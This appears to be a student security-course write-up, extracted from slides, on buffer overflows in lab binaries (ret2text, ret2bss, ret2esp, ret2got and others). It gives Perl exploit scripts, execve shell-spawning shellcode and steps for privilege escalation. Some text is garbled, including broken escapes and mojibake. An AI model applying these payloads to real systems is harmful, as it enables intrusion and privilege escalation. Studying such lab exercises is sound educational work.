This project was completed in order to gain hands-on experience in smashing the stack by exploiting vulnerabilities in a given binary.
The project involved designing exploits and eggs(payload) for various vulnerabilities that may exist in a given binary and execute the exploits to perform privilege escalation.
This project is meant for education purpose only.
1. ret2text.c
⢠Here the exploit is executed by overflowing the buffer, corrupting the old ebp value and replacing the
return address by the address of secret function.
⢠This exploit allows to execute secret function even though guid is not equal to â0â.
⢠EXPLOIT SCRIPT:
⢠#!/usr/bin/perl
# This address must match the address of secret function in the victim's program */
my $retaddr = "x96x84x04x08"; #0x8048496
# Fill NOP instruction
my $pad = "x90" x 24; #overwriting buffer and EBP
# Input string to our victim's program
my $arg = $pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2text";
print OUT $arg;
close OUT;
2. ⢠EVIDENCE SCREENSHOT:
⢠The address of the secret function
is obtained.
⢠Observe the stack frame of the
public function to check the buffer
size allocated.
⢠Prepare a payload using the script
as shown in the previous page.
⢠The payload must be 24 bytes of
NOP + 4 bytes to overwrite return
address.
⢠Inject the payload and the function
prints âsecretâ.
3. ret2bss.c
⢠This exploit makes use of the address of the global buffer since it does not change.
⢠You need not worry about the local buffer size and address
⢠EXPLOIT SCRIPT:
⢠my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the global buffer variable of the victim's program */
my $retaddr = "x40xa0x04x08"; #0x804a040
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $shellcode.$pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_bss";
print OUT $arg;
close OUT;
4. EVIDENCE SCREENSHOT:
⢠Observe the stack frame of the
method function to check the
buffer size allocated.
⢠Prepare a payload to overwrite
the return address by the
address of the global buffer
⢠The payload must be of 272
bytes: 24 bytes shellcode + 244
bytes padding + 4 bytes return
address.
⢠Inject the payload and the shell
code gets executed, spawning
the shell.
5. strptr.c
⢠This exploit redirects the pointers to spawn a shell.
⢠Makes use of the vulnerable function strptr.
⢠Exploit Script:
⢠# this address must be the address of license pointer
my $licenseaddr = "x82x85x04x08x82x85x04x08"; #two times because you have to over the conf ptr address by license
ptr.
# Fill NOP instruction
my $pad = "x90" x 256;
# Input string to our victim's program
my $arg = $pad.$licenseaddr;
# Let us store the input string to a file
open OUT, "> payload_strptr";
print OUT $arg;
close OUT;
6. EVIDENCE SCREENSHOT:
⢠Disassemble main to find out the
address of the license and conf
pointers.
⢠Create a file with name âTHISâ
and then add the following: echo
âyou have been hahcked by
meâŚ..â
/bin/sh
⢠Generate a payload of 264 bytes:
to overwrite conf ptr by license
ptr.
⢠Inject the payload, when the
control is transferred to system
function, the file âTHISâ will be
executed and the shell will be
spawned.
7. funcptr.c
⢠This exploit redirects the function pointers to spawn a shell.
⢠Makes use of the vulnerable function strptr.
⢠Exploit script:
⢠# this address must be the address of system instruction
my $systemaddr = "x40x83x04x08";
# Fill NOP instruction
my $pad = "x90" x 64;
# Input string to our victim's program
my $arg = $pad.$systemaddr;
# Let us store the input string to a file
open OUT, "> payload_funcptr";
print OUT $arg;
close OUT;
8. EVIDENCE SCREENSHOT:
⢠Disassemble the function
method to know the address of
the system instruction.
⢠Generate a payload by using the
script as show in the previous
slide.
⢠The payload must of 68 bytes:
64 bytes NOP + 4 bytes of
system instruction address.
⢠Inject the payload as the first
input and the â/bin/shâ as the
second input.
⢠The system instruction executes
/bin/sh and the shell is
spawned.
9. ret2pop.c
⢠This exploit makes use of the vulnerable function strcpy.
⢠EXPLOIT SCRIPT:
⢠my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address of the pop and ret instruction sequence
my $retaddr = "xcbx84x04x8"; #80484cb
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $pad.$shellcode.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2pop";
print OUT $arg;
close OUT;
10. EVIDENCE SCREENSHOT:
⢠Disassemble the function
method to obtain the buffer size
and observe the stack frame.
⢠Using objdum âd obtain the
address of the pop and ret
instructions.
⢠Prepare a payload using the
script shown in the previous
slide.
⢠Payload must be 272 bytes: 244
bytes pad + 24 bytes shellcode +
4 bytes ret address.
⢠Inject the payload and the shell
is spawned as shown in the
figure.
11. ret2esp.c
⢠This exploit makes use of the jmp *esp instruction to control the flow of execution.
⢠It is done by determining the address of 58623 and hence the address of jmp *esp instruction.
⢠EXPLOIT SCRIPT:
⢠my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address where jmp *%esp or ff e4 instruction is stored
my $retaddr = "x42x84x04x08"; #8048424
# Fill NOP instruction
my $pad = "x90" x 268; # times because I need 16 bytes to hit the return address. 9+7 = 16.
# Input string to our victim's program
my $arg = $pad.$retaddr.$shellcode;
# Let us store the input string to a file
open OUT, "> payload_ret2esp";
print OUT $arg;
close OUT;
12. EVIDENCE SCREENSHOT:
⢠Disassemble the main program
and obtain the address of âff e4â.
⢠Disassemble the function method
to observe the stack structure and
obtain the size of the buffer.
⢠Generate a payload using the
script as shown in the previous
slide.
⢠Payload = 268 bytes Pad + 4 bytes
ret address + 24 bytes shellcode.
⢠Inject the payload and the shell is
spawned as shown in the figure.
13. ret2got.c
⢠In this exploit the first strcpy instruction is used to overflow the buffer array and overwrite ptr by
printf GOT reference.
⢠This is accomplished by using the second strcpy and overwriting GOT entry of printf.
⢠EXPLOIT SCRIPT:
⢠./ret2got `perl -e 'print "A"x8 . "x0cxa0x04x08"'` `perl -e 'print "x46x83x04x08ââ`
⢠Entry for printf is 0x804a00c
⢠Dynamic linker address for system is 0x08048346
14. EVIDENCE SCREENSHOT:
⢠Disassemble main and obtain the
relevant entry point for ptintf i.e.
0x804a00c
⢠Disassemble anyfunction to obtain
the address where dynamic linker
call of the system happens i.e.
0x08048346
⢠The payload must have 8 bytes
followed by 4 bytes address of
printf and 4 bytes address where
system call happens.
⢠Create a file called array and add
the following instruction: /bin/sh
⢠Inject the payload and the shell is
spawned as shown in the figure.